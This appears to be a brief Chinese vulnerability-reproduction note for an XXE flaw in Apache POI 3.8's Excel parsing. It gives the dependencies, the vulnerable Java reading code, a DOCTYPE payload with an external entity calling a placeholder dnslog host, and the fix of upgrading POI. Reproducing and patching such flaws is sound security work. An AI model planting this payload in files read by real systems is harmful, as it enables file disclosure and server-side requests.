org.apache.poi 3.8 excel xxe漏洞复现
复现步骤
pom.xml引入依赖
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi</artifactId>
<version>3.8</version>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>3.8</version>
</dependency>
关键代码:
public String readExcelData(String path,String sheetName) throws IOException { FileInputStream fileInputStream = null; fileInputStream = new FileInputStream(path); XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream); //获取sheet sheet = sheets.getSheet(sheetName); //获取行数 int rows = sheet.getPhysicalNumberOfRows(); StringBuilder cell= new StringBuilder(); for (int i = 0; i < rows; i++) { //获取列数 XSSFRow row = sheet.getRow(i); int columns = row.getPhysicalNumberOfCells(); for (int j = 0; j < columns; j++) { cell.append(row.getCell(j).toString()).append("</br>"); } } return cell.toString(); }
xxe.xlsx解压后,修改[Content_Types].xml,在第二行加入
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://dnslog/test.dtd"> ]> <x>&xxe;</x>
访问后即可触发dnslog
解决方案:
升级poi到4.0.1以上版本